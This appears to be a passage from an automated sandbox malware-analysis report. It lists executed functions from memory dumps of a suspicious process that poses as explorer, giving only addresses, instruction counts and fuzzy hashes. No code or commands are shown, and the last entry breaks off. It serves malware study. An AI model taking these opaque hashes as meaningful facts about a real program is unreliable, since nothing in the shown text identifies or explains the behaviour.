                                                            • Source File: 00000021.00000002.1909702891.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_33_2_7ffd9ba00000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0eef4ac1751eeed90cfd1730c59f50bff1dfd871d737e56bb89dde4e1ff689fa
                                                            • Instruction ID: 77eb57825d8557362d696eacd50ebbdcf49590f7d6a6d6e2adf0ab05fc602a8c
                                                            • Opcode Fuzzy Hash: 0eef4ac1751eeed90cfd1730c59f50bff1dfd871d737e56bb89dde4e1ff689fa
                                                            • Instruction Fuzzy Hash: 31C02B13B8AD0F098B047358B880CE1F380C7501303400AB3C80BC104CDC1B98C14340

                                                            Executed Functions

                                                            Function 00007FFD9BA21222 Relevance: .4, Instructions: 390COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5009d1b83950b94ab9b6b66edf15b2f920bedaae821763d1b278d98af2b9a8b
                                                            • Instruction ID: 835d7cd051fc0dfd6bfd40f2c9c0d9f556ee68d4e9f9a83df9fec8f5d3758e5c
                                                            • Opcode Fuzzy Hash: f5009d1b83950b94ab9b6b66edf15b2f920bedaae821763d1b278d98af2b9a8b
                                                            • Instruction Fuzzy Hash: BAC16A20B5E68E0FEB699B78C4652B53BD1EFA6310F0640BED48EC71E7DD5DA8428341
                                                            Function 00007FFD9BA2276D Relevance: .7, Instructions: 680COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9429a5f0c87ffe4b4587ea383576b1ebfb95b6fc5203f352c933109752d36259
                                                            • Instruction ID: 399696db1028527127c8ab97912841ff8c6ace683f3caec996a03a4073adb95d
                                                            • Opcode Fuzzy Hash: 9429a5f0c87ffe4b4587ea383576b1ebfb95b6fc5203f352c933109752d36259
                                                            • Instruction Fuzzy Hash: BF323331B4D78E4FE775ABA488626B837E1EF41310F0600B9D44D875E7CE6DAD0A8792
                                                            Function 00007FFD9BA234AF Relevance: .5, Instructions: 489COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7dd1bffa864983c4c4c273b9f11b7907340e28eeb395371d6bc61c43f657aee2
                                                            • Instruction ID: 018ed42d063fc9100359e866c352544ecc1fcd0850706f6254b3377359d0b12b
                                                            • Opcode Fuzzy Hash: 7dd1bffa864983c4c4c273b9f11b7907340e28eeb395371d6bc61c43f657aee2
                                                            • Instruction Fuzzy Hash: 11E12422F0991A4EEB14FBBCE8A6AEC77A0FF85361F10017BD04DC7197CE2568458B91
                                                            Function 00007FFD9BA234D3 Relevance: .5, Instructions: 467COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92e915474925d2a770db2e58212bfe69c5c16a800175d43b3c03715781aebec6
                                                            • Instruction ID: 5b5c3fa8ca4535cc5cf6e1f074d0bd8d41728faebe2d5913a520c27cb3caf616
                                                            • Opcode Fuzzy Hash: 92e915474925d2a770db2e58212bfe69c5c16a800175d43b3c03715781aebec6
                                                            • Instruction Fuzzy Hash: A7D10522F0991A4EEB14FBBCE8A5AEC77A0FF85361F00017BD04DD7197CE2568458B91
                                                            Function 00007FFD9BA248F1 Relevance: .5, Instructions: 463COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a8fecf41329746faeec05cccaf336bb31980f93e5f9746553177912b20faff8
                                                            • Instruction ID: e9b80c3f93a599734e1653bfab07143e649223bf19b90242c108f13cb9c2cfc3
                                                            • Opcode Fuzzy Hash: 1a8fecf41329746faeec05cccaf336bb31980f93e5f9746553177912b20faff8
                                                            • Instruction Fuzzy Hash: 92E1C661F9E91E4FFBB8DB9884A567937E1FF94300B52047DD20DC32BADDA869414780
                                                            Function 00007FFD9BA235D3 Relevance: .4, Instructions: 356COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e9def296c5195b7fc9bd26846f539d19238b36bca285171d05b31de96c164028
                                                            • Instruction ID: 21da8b77677beafeb5f985fc22293be53c419ec9f13b4e5c379386a464116100
                                                            • Opcode Fuzzy Hash: e9def296c5195b7fc9bd26846f539d19238b36bca285171d05b31de96c164028
                                                            • Instruction Fuzzy Hash: BDB1D322F1991D4EEB54FBA8EC65AED7BB0FF85361F00017BD00DD7296CE2568458B81
                                                            Function 00007FFD9BA22640 Relevance: .3, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 87d454ecf0f8392720caa0d4f406a79d361fcc1d46c9e08d4b14f1a316b6e1ef
                                                            • Instruction ID: 1c93317140a092aa76e608e740063bcc993249feb1256c086fda86a2219cf250
                                                            • Opcode Fuzzy Hash: 87d454ecf0f8392720caa0d4f406a79d361fcc1d46c9e08d4b14f1a316b6e1ef
                                                            • Instruction Fuzzy Hash: 97B10531B0DA4E4FE768EBA8C8646BA7792EF85314F5500B9D01EC72D7CE29AC46C741
                                                            Function 00007FFD9BA20EB5 Relevance: .3, Instructions: 285COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c562a757cc0ed4f406ec74b45b187a1b75b23f7ce7e3a2ab98447489e914bc7e
                                                            • Instruction ID: 125243604186e6c5ea06f89d9431865713e529c0e098ede9f93ba5051cc8a397
                                                            • Opcode Fuzzy Hash: c562a757cc0ed4f406ec74b45b187a1b75b23f7ce7e3a2ab98447489e914bc7e
                                                            • Instruction Fuzzy Hash: 2B81C431B1994D5FDBA8EBA8C4656B8B7E2EF98710F0501BAD04ED32D6CE646C428780
                                                            Function 00007FFD9BA239E9 Relevance: .2, Instructions: 232COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54b7e13d42dc803b23cc60998e1f432dff38a8615a8dee7c19557efc643da75f
                                                            • Instruction ID: 3e639e44a9332e326b4d5135b75fde306c9676b9be913804a8d5a920f0b39f23
                                                            • Opcode Fuzzy Hash: 54b7e13d42dc803b23cc60998e1f432dff38a8615a8dee7c19557efc643da75f
                                                            • Instruction Fuzzy Hash: 79811B70E0961D8FDB94EBA8C8A5AAC77F1FF58300F5004BAD00DE7295DA75A981CB41
                                                            Function 00007FFD9BA20B85 Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2ff7f4f0a8097710ee1c887a288f150d1176d2bb88eb87cc26a02be2a3792d60
                                                            • Instruction ID: 181c3e0868808bfd279eb0c87fc9c316978978f73b4d1791d03a3b954d79f129
                                                            • Opcode Fuzzy Hash: 2ff7f4f0a8097710ee1c887a288f150d1176d2bb88eb87cc26a02be2a3792d60
                                                            • Instruction Fuzzy Hash: 96412B217199490FDB99FB7884A5EB577D2EF98300B0641B6E41EC32E7CD29ED42C341
                                                            Function 00007FFD9BA20CDA Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e00dff9ccba55725332c9bc00d759f4fa768663cbaa28aa9a5179f69d641d3b
                                                            • Instruction ID: 852ba2762173d4f1101cdd7ce6434c5606203d83d1bdb84e2f63ba4e297ee24c
                                                            • Opcode Fuzzy Hash: 0e00dff9ccba55725332c9bc00d759f4fa768663cbaa28aa9a5179f69d641d3b
                                                            • Instruction Fuzzy Hash: 57310B61B0DA840FE758A76C981A7B97BD1EF99714F0001BEF44EC32C7CD6868028786
                                                            Function 00007FFD9BA250A9 Relevance: .1, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15501fc2ff455542aa853801034b1a04d4ad5e42f42c94c80a8cf0af1b557d6b
                                                            • Instruction ID: b326d18d2e24c5ca09ab8abfe8aa416ef378f2cd845f317c92c4cef54ae0bd83
                                                            • Opcode Fuzzy Hash: 15501fc2ff455542aa853801034b1a04d4ad5e42f42c94c80a8cf0af1b557d6b
                                                            • Instruction Fuzzy Hash: 01310321B0EA4D0FDB55EB6848756B87BF1FF58200B0A01FBD44DD7297CD28AD048392
                                                            Function 00007FFD9BA20860 Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d068df7816175ee5ceb0f14cd8b42e4e9a873619e99b6c88f927b0dd65782fff
                                                            • Instruction ID: 077bc848be8d853e4895df427bfdd9cc037ecc93e7fe3276baa7db02455da364
                                                            • Opcode Fuzzy Hash: d068df7816175ee5ceb0f14cd8b42e4e9a873619e99b6c88f927b0dd65782fff
                                                            • Instruction Fuzzy Hash: 0F217732B0E78D0FEB66AB7C90B11EA3BE0DF95260F0541BBE48DC71A3CD19A5468341
                                                            Function 00007FFD9BA20A76 Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f7d1b360972fcc9073429eabc9f1f625b3b92476ca47aed1b196ea130b889e8
                                                            • Instruction ID: 62a31e04ec701e488873bcefcc83226189d76774b8564608e8489175b84d24a1
                                                            • Opcode Fuzzy Hash: 1f7d1b360972fcc9073429eabc9f1f625b3b92476ca47aed1b196ea130b889e8
                                                            • Instruction Fuzzy Hash: 9331C431A4951D8FEF64EBB4C4696E9BBF0FF18300F4545B6D40AE31A1DA78A984CB50
                                                            Function 00007FFD9BA22488 Relevance: .1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12ff673b31f7df5c64f452ece7cb4ff6e19c823fc5e490e99bcce01b808618f2
                                                            • Instruction ID: 191a026f2f7a5a62c34d87ec1959d52c59466553cabdd81f3924a22cbf1a8998
                                                            • Opcode Fuzzy Hash: 12ff673b31f7df5c64f452ece7cb4ff6e19c823fc5e490e99bcce01b808618f2
                                                            • Instruction Fuzzy Hash: DF21D331F1880E4BEB58FB9C98656FD73E2FB98310F1501BBE81DD3285CD69A9414781
                                                            Function 00007FFD9BA209C1 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 090661dca16a1ce6291093721b826155e844a3803202c5c2670dacaeb64b610f
                                                            • Instruction ID: 314b0e4d9ecfc577196f9a649392b4bf9ff78a01a93e24ce4a242c5b004419d8
                                                            • Opcode Fuzzy Hash: 090661dca16a1ce6291093721b826155e844a3803202c5c2670dacaeb64b610f
                                                            • Instruction Fuzzy Hash: 7011A512F8ED4F0FF7B8ABED14796B52AC1DFA5A10B4601BBD44DC21A7DD88AD054384
                                                            Function 00007FFD9BA2089D Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e900f38ff7a2953eb7c5a0fc3e7819009065fddd465b2d3de5299532192eaf63
                                                            • Instruction ID: 351a6dd365614e48c521aca044fc45157aaf80e86750861336f68c0a4cb1cce3
                                                            • Opcode Fuzzy Hash: e900f38ff7a2953eb7c5a0fc3e7819009065fddd465b2d3de5299532192eaf63
                                                            • Instruction Fuzzy Hash: 4111593164DB8D0FD795EB2880741AA7BE0EF98360F01457FE44DC31B2DD69A9428341
                                                            Function 00007FFD9BA209E0 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77dea8cd4c5ae6f3ab6e0142a670b0e1de1779b23ca7d8d2b4e8af3537f6b3ed
                                                            • Instruction ID: df482d7bb8e28b129f70414947efa8f0b61fdb26c11e2a8b0370baa9d2fd1c39
                                                            • Opcode Fuzzy Hash: 77dea8cd4c5ae6f3ab6e0142a670b0e1de1779b23ca7d8d2b4e8af3537f6b3ed
                                                            • Instruction Fuzzy Hash: DC012012F4ED0F0BF2F86BDC14756B625C5DFE4A10B82017BE80DC21DADC89AD464384
                                                            Function 00007FFD9BA20E39 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 256721b532a9c76f4c49015006849ac1a1f79d09646179319b52b5b10c1f037d
                                                            • Instruction ID: 31cc9036137db2f09679a3bcab5cd1d414f784ba1ce8aa554c80c70165e29541
                                                            • Opcode Fuzzy Hash: 256721b532a9c76f4c49015006849ac1a1f79d09646179319b52b5b10c1f037d
                                                            • Instruction Fuzzy Hash: 12012B20B4E6C80FD357E37898A96B47FD1AF87215B0941F6E44CCB0B7C9984946C342
                                                            Function 00007FFD9BA24F11 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d1f02df0e0673a436c671bd1c434506f8b71f8fc46647854b792b9e84c0850e
                                                            • Instruction ID: 2a2f1eb3606d513978510321da6990c3dded28c556f2df8cdb8cc37d757f6179
                                                            • Opcode Fuzzy Hash: 9d1f02df0e0673a436c671bd1c434506f8b71f8fc46647854b792b9e84c0850e
                                                            • Instruction Fuzzy Hash: 3B014920B4E1860AE72923B844703F82B519FC2314F4601FAD46DCE1FBCD9D19968351
                                                            Function 00007FFD9BA24064 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 744ad3a31135ed01bde5ce1181d377dee460423ca6e1a711f29fa48ac86c01b5
                                                            • Instruction ID: f5a15237d0b36e815ec9c37a5768a805cb45703c203381eb9cdb4654b8de191e
                                                            • Opcode Fuzzy Hash: 744ad3a31135ed01bde5ce1181d377dee460423ca6e1a711f29fa48ac86c01b5
                                                            • Instruction Fuzzy Hash: 91F0F452F4E80E1AEFACAB6C14A61F877D1FFA8210B61007ED60DC31AADD186D864341
                                                            Function 00007FFD9BA2518D Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e90fcc621b3375cd9b60d9b2f98e6c566d1664f292bb0b28d809d8ddc761afb5
                                                            • Instruction ID: 513dc764ae5281a0360e64ac494baf107d25a77a13ac2b83bf6c488f975ca259
                                                            • Opcode Fuzzy Hash: e90fcc621b3375cd9b60d9b2f98e6c566d1664f292bb0b28d809d8ddc761afb5
                                                            • Instruction Fuzzy Hash: 34F04431F0541E4BEF64FB9C99651FD73E2FB98310B150476D41DE3295CD24AA418B91
                                                            Function 00007FFD9BA20DF6 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9941ddde04a21bc027bfeb0689bb759aa38b9d3e9005822cea1100380d49e625
                                                            • Instruction ID: 0d625c10d8a76ea575eb9b219e7e6af0103ea344c23a7699bfce61cf2257f482
                                                            • Opcode Fuzzy Hash: 9941ddde04a21bc027bfeb0689bb759aa38b9d3e9005822cea1100380d49e625
                                                            • Instruction Fuzzy Hash: 74E0E57294E64C1EAB18AA59EC17CF67B98DA87234B00005FF19D81163E15269638255
                                                            Function 00007FFD9BA23C81 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 371a412e000908afb1e5e7267bc8eeaee5b18addb8913a164cbc092af2b4ace8
                                                            • Instruction ID: 8c1717ff6cbce715d7a5eb43cc542f15dca5fa5391b9cd7966a012f5dea5d8ff
                                                            • Opcode Fuzzy Hash: 371a412e000908afb1e5e7267bc8eeaee5b18addb8913a164cbc092af2b4ace8
                                                            • Instruction Fuzzy Hash: C7E0DF31A9EA0C5FDB28AB59BC2068876E2FB8A318F0102AAE44CC3291D7765759C301
                                                            Function 00007FFD9BA24D65 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3012ffcc16421758fd446a64e994acd94843ffabee1119917610926bf09b577b
                                                            • Instruction ID: 48073bd225354c0b19f731387d65775c0bfbfb67dd06abc0b83a8f364ef71d58
                                                            • Opcode Fuzzy Hash: 3012ffcc16421758fd446a64e994acd94843ffabee1119917610926bf09b577b
                                                            • Instruction Fuzzy Hash: 60E0C03288EA0C8BEB48AB985C202D833A0FF49308F01016DE40CC31A4D7715A41C340
                                                            Function 00007FFD9BA24EF0 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f8efce2b46623514704c1e48e0e8732b6ad46241c62fcddb8dd34d12b0ce8df
                                                            • Instruction ID: 0ab124ff2564a8bd518f1ab0cc162a7b3af20ddd1920e49b200b15a8ad66ac9f
                                                            • Opcode Fuzzy Hash: 8f8efce2b46623514704c1e48e0e8732b6ad46241c62fcddb8dd34d12b0ce8df
                                                            • Instruction Fuzzy Hash: 7FD0924184F7C54ED70252BA1C290806FA06E0781074E41EBC5C5CA1A3D48D19898323
                                                            Function 00007FFD9BA20CC0 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000022.00000002.1906766834.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_34_2_7ffd9ba20000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb6e4c54c377ef72e8fb78bcf5267bc26b633d03d0435c340a910bbe747744d3
                                                            • Instruction ID: 77eb57825d8557362d696eacd50ebbdcf49590f7d6a6d6e2adf0ab05fc602a8c
                                                            • Opcode Fuzzy Hash: cb6e4c54c377ef72e8fb78bcf5267bc26b633d03d0435c340a910bbe747744d3
                                                            • Instruction Fuzzy Hash: 31C02B13B8AD0F098B047358B880CE1F380C7501303400AB3C80BC104CDC1B98C14340

                                                            Executed Functions

                                                            Function 00007FFD9BA01222 Relevance: .4, Instructions: 391COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1907956166.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9ba00000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fdda82b71d123c3346b36e166bf53fa264cbce48ab1f508e18c5d85c19b11bdf
                                                            • Instruction ID: 75fd2d1d2e1f52c2a637c67ee90072f49c8e19284b3d0626fb22f457363162e3
                                                            • Opcode Fuzzy Hash: fdda82b71d123c3346b36e166bf53fa264cbce48ab1f508e18c5d85c19b11bdf
                                                            • Instruction Fuzzy Hash: 3DC15A20B0E68A0FE7699B7884652F57BD1EF67310F1640BEE4CAC71E7DD5DA8428341
                                                            Function 00007FFD9BA048F1 Relevance: .5, Instructions: 461COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1907956166.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9ba00000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8384fc6f1e6a6306672dd87f78e0474661dc1eb62c7b16b87fa5b32234a99f55
                                                            • Instruction ID: 1dcec22c440aa7ee0237954fb9fcaa98111a40400af3b700e8c11267a8ecbc0b
                                                            • Opcode Fuzzy Hash: 8384fc6f1e6a6306672dd87f78e0474661dc1eb62c7b16b87fa5b32234a99f55
                                                            • Instruction Fuzzy Hash: 64E1A261F1AA1E8FE7B8EB9884A567937F1FF95300F52447DD08DC31B2DEA869418380
                                                            Function 00007FFD9BA02640 Relevance: .3, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1907956166.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9ba00000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ab637c8c1be68fc455f0148537462adb64ffa2ddee2c1084c657ed4f43e8c28
                                                            • Instruction ID: 0ec17a3f0521f730c1ea071c1a85dfcef7d424814289753b5cbffaeb4bba181b
                                                            • Opcode Fuzzy Hash: 6ab637c8c1be68fc455f0148537462adb64ffa2ddee2c1084c657ed4f43e8c28
